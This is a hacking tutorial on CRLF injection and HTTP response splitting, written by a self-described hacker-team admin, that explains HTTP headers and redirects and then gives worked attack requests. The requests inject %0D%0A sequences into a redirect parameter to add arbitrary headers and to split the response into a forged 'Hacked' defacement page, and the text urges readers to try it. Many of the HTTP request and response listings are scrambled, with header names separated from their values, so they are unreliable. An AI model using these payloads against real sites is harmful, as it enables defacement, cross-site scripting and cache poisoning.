Professional Documents
Culture Documents
CRLF Injection
CRLF Injection
---------------------------------------Presented by :Gurender Singh C0d3 N4m3 Un_N0n Antil0g >> Team Indi HeX (Admin) >> Indian Cyber Police (Core Member)
Biography of Author
Gurender Singh A.K.A Un_N0n Antil0g is Learner and Independent IT security researcher , currently working with Team Indi HeX And ICP Helping new people in field of hacking and security. He is Admin of Team Indi HeX. And Admin of Indian Cyber Police with Nipun jaswal , Chetan Soni , COde InjectOr. Gurender with his team , have hacked and patched many servers. Have helped many admins to restore there servers and stuff.
BRIEF INTRODUCTION
CRLF Injection Vulnerability is a web application vulnerability happens due to direct passing of user entered data to the response header fields like (Location, Set-Cookie and ETC) without proper sanitations, which can result in various forms of security exploits. Security exploits range from XSS, Cache-Poisoning, Cache-based defacement, page injection and ETC.
WHAT IS CRLF ?
CR (Carriage Return) and LF (Line Feed) are nonprintable characters which indicate end-of-line. >> Like:If you type anything in any text editor, then press enter, the CR and LF characters are automatically inserted at end of line. In ASCII table, CR has value equals to 13 And LF has value equals to 10 (Both in decimals) Sometimes they are also written as:r\n\.
HTTP HEADER
HTTP HEADERS are requests to server, and in return server responses to it showing the required webpage. In other words, Its requests to server through web browser, in return server response, and the web browser reads it then displays web pages. The first page that opens in web browser is:THE HOMEPAGE OF WEBSITE. For example:www.abc.com so to understand it more , I will show you the requests that browser makes and the request it receives from server.
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: Accept-Encoding: Accept-Charset: Connection: en-us,en;q=0.5[CRLF] gzip, deflate[CRLF] ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF] keep-alive[CRLF][CRLF]
[#] ~ Servers Response. --------------------------------------------------HTTP/1.1,200,OK[CRLF] Date: Server: PHP/5.0.2[CRLF] X-Powered-By: Keep-Alive: Connection: Wed,24,Aug,2011 17:48:46 GMT[CRLF] Apache/1.3.33 (Win32) PHP/5.0.2[CRLF] timeout=15, max=100[CRLF] Keep-Alive[CRLF]
Transfer-Encoding: Content-Type:
chunked[CRLF] text/html[CRLF][CRLF]
[#] ~ WEBPAGE DISPLAYED. --------------------------------------------------<HTML> <BODY> <TITLE> Welcome to ABC.com </TITLE> <BODY> <CENTER> Welcome to ABC.com </CENTER> </BODY> </HTML>
---------------------------------------------------
As shown above, browser sends request to server, server reads that request and response
to it, browser understands that request by server and displays that WEBPAGE.
REDIRECTION
All most every websites have redirections, redirection is process, in which the particular webpage redirects the current page to another webpage in some time (depending upon JavaScript used). >> Lets take example and understand it. Suppose this website abc.com redirects to xyz.com. So the code present would be something like this:<HTML><BODY><TITLE> Welcome to Example.com</TITLE><META HTTP-EQUIV='Refresh' CONTENT='5; URL=http://www.ABC.com/redir.php? url=http://www.XYZ.com'><body><b>
<center>Welcome to ABC.com </b><br><br><br><br> <font color='red' size='4'>Please wait a few seconds while we redirect you to the main page</font> </center></BODY></HTML>
[#] ~ HEADER VIEW OF REDIRECTION. --------------------------------------------------GET/redir.php?url=http://www.XYZ.com HTTP/1.1[CRLF] Host: www.ABC.com[CRLF] User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF] Accept-Language: en-us,en;q=0.5[CRLF] Accept-Encoding: gzip, deflate[CRLF] Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF] Connection: keep-alive[CRLF][CRLF]
Date: Tue, 23 Aug 2011 17:52:17 GMT[CRLF] Server: Apache/1.3.33 (Win32) PHP/5.0.2[CRLF] X-Powered-By: PHP/5.0.2[CRLF] Location: http://www.XYZ.com[CRLF] (User-input in Location) Keep-Alive: timeout=15, max=99[CRLF] Connection: Keep-Alive[CRLF] Transfer-Encoding: chunked[CRLF] Content-Type: text/html[CRLF]
GET / HTTP/1.1[CRLF] Host: www.XYZ.com[CRLF] User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF] Accept-Language: en-us,en;q=0.5[CRLF] Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: keep-alive[CRLF][CRLF]
---------------------------------------------------
The server of www.XYZ.com responds with HTTP 200 OK and displays the content of homepage of XYZ.com.
CRLF INJECTION.
So, we have learned about HTTP HEADERS and REDIRECTION. As we can observe, the data coming from user can be modified. So for what the hell your waiting for ? :P Modify it Let us take one example:Notice %0d%0a in following Request:(CR also have D or 0D value in hex and RL have A and 0A in hex)
[#] ~ Browsers Request. --------------------------------------------------GET/redir.php?url=%0D%0ANew_Header:New_Header_Value%0D %0A HTTP/1.1[CRLF] Host: www.example.com[CRLF] User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF] Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8[CRLF] Accept-Language: Accept-Encoding: Accept-Charset: 8;q=0.7,*;q=0.7[CRLF] Connection: en-us,en;q=0.5[CRLF] gzip, deflate[CRLF] ISO-8859-1,utfkeep-alive[CRLF][CRLF]
[#] ~ Servers Reponse. --------------------------------------------------HTTP/1.1 302 Found[CRLF] Date: Server: Tue, 23 Aug 2011 18:34:36 GMT[CRLF] Apache/1.3.33 (Win32) PHP/5.0.2[CRLF]
PHP/5.0.2[CRLF]
New_Header: New_Header_Value[CRLF] (An injected header field using the CRLF characters, ) Keep-Alive: Connection: Transfer-Encoding: Content-Type: timeout=15, max=99[CRLF] Keep-Alive[CRLF] chunked[CRLF] text/html[CRLF][CRLF]
--------------------------------------------------As you can see , in above browser request, we have injected one CRLF characters. Its injected around the value:New_Header:New_Header_Value (%0D %0ANew_Header:New_Header_Value%0D%0A)
ANOTHER EXAMPLE. [#] ~ Browsers Request. --------------------------------------------------GET/redir.php?url=%0d%0aContent-Type:%20text/html %0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type: %20text/html%0d%0a%0d%0a%3Ccenter%3E %3Ch1%3EHacked%3C/h1%3E%3C/center%3E HTTP/1.1[CRLF] Host: www.ABC.com[CRLF] NT 5.1; rv:6.0)
Accept:text/html,application/xhtml+xml,application/xml;q =0.9,*/*;q=0.8[CRLF] Accept-Language: Accept-Encoding: Accept-Charset: 8;q=0.7,*;q=0.7[CRLF] Connection: en-us,en;q=0.5[CRLF] gzip, deflate[CRLF] ISO-8859-1,utfkeep-alive[CRLF][CRLF]
[#] ~ Servers Reponse. --------------------------------------------------HTTP/1.1 302 Found[CRLF] Date: Server: Tue, 23 Aug 2011 18:49:08 GMT[CRLF] Apache/1.3.33 (Win32) PHP/5.0.2[CRLF] X-Powered-By: PHP/5.0.2[CRLF] Location:[CRLF]
Content-Type: text/html[CRLF][CRLF]
HTTP/1.1 200 OK [CRLF] (New Response Header Created Using CRLF Injection, Response Splitting) Content-Type: text/html[CRLF][CRLF]
<center><h1>Hacked</h1></center>[CRLF] Keep-Alive: Connection: Transfer-Encoding: Content-Type: timeout=15, max=100[CRLF] Keep-Alive[CRLF] chunked[CRLF] text/html[CRLF][CRLF]
In Above, That shows the creation of new header using CRLF injection. The entire data in the "url" parameter is again injected in the response header this time the data is crafted such a way that it leads to a new header creation. Now, the webpage that will display will be something like this.
Hope you guys like this book on CRLF injection. I will soon release video on it that would help you to understand this Vulnerbility in deep.
Source:-
THANK YOU